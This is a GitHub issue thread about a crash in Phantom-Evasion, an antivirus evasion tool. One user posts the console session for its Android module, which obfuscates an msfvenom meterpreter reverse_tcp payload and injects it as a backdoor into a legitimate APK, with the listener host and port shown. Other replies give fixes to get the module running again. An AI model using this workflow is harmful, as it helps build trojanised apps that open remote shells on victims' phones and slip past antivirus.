search

oddcod3 / Phantom-Evasion

Python antivirus evasion tool
GNU General Public License v3.0
1.38k stars 333 forks source link

[>] Obfuscating Smali code... #65

Open cypherskb opened 4 years ago

cypherskb commented 4 years ago

Traceback (most recent call last): File "./phantom-evasion.py", line 402, in CompleteMenu() File "./phantom-evasion.py", line 190, in CompleteMenu Phantom_lib.ModuleLauncher(module_type) File "Setup/Phantom_lib.py", line 937, in ModuleLauncher LoadExecModule(M_type,ModOpt) File "Setup/Phantom_lib.py", line 591, in LoadExecModule ApkSmaliObfuscator_android(ModOpt) File "Modules/payloads/MsfvenomObfuscateBackdoor_android.py", line 287, in ApkSmaliObfuscator_android os.rename("msf_smali/smali/com/metasploit","msf_smali/smali/com/" + ModOpt["Metaspl"]) OSError: [Errno 2] No such file or directory

oddcod3 commented 4 years ago

Hi @cypherskb could you post more details about the options used?

ajxdadev commented 4 years ago

Having hte same issue !! Options used are : payload : android/meterpreter/reverse_tcp No Custom MSF options selected Inject backdoor into another apk? YES

[+] MODULE DESCRIPTION:

Msfvenom android payload obfuscator smali/baksmali msfvenom payloads with apktool [>] Obfuscated payload can be used to backdoor apk file [>] Outformat: apk

Press Enter to continue:

[>] Insert msfvenom payload (default: android/meterpreter/reverse_tcp):

[>] Insert LHOST: 10.64.3.247

[>] Insert LPORT: 4444

[>] Custom msfvenom options(default: empty):

[>] Inject backdoor into another apk?(default:Y/n): y

[>] Insert apk filename to backdoor: /root/Downloads/com.google.android.tag_1.1-101_minAPIR(nodpi)_apkmirror.com.apk

[>] Insert output filename:bund

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload No encoder or badchars specified, outputting raw payload Payload size: 10181 bytes Saved as: msf_gen.apk

[>] Baksmaling...

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Destination directory (/root/Phantom-Evasion/msf_smali) already exists. Use -f switch if you want to overwrite it.

[>] Baksmaling...

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true I: Using Apktool 2.4.1 on com.google.android.tag_1.1-101_minAPIR(nodpi)_apkmirror.com.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk I: Renamed manifest package found! Replacing com.google.android.tag with com.android.apps.tag I: Decoding file-resources... I: Decoding values / XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files...

[>] Obfuscating Smali code...

Traceback (most recent call last): File "./phantom-evasion.py", line 402, in CompleteMenu() File "./phantom-evasion.py", line 190, in CompleteMenu Phantom_lib.ModuleLauncher(module_type) File "Setup/Phantom_lib.py", line 937, in ModuleLauncher LoadExecModule(M_type,ModOpt) File "Setup/Phantom_lib.py", line 591, in LoadExecModule ApkSmaliObfuscator_android(ModOpt) File "Modules/payloads/MsfvenomObfuscateBackdoor_android.py", line 287, in ApkSmaliObfuscator_android os.rename("msf_smali/smali/com/metasploit","msf_smali/smali/com/" + ModOpt["Metaspl"]) FileNotFoundError: [Errno 2] No such file or directory: 'msf_smali/smali/com/metasploit' -> 'msf_smali/smali/com/mlttti'

vij7661 commented 4 years ago

remove msf_smali file from phantom-evasion folder and rerun python3.Phantom-Evasion.py

sam14x commented 4 years ago

this is the solution that i found and worked for me Use sudo apktool empty-framework-dir

then delete the smali folders and previous projects data from phantom evasion folder then run the setup script (#7 or 8 i guess) from phantom_evasion.py and rerun script

Hope this works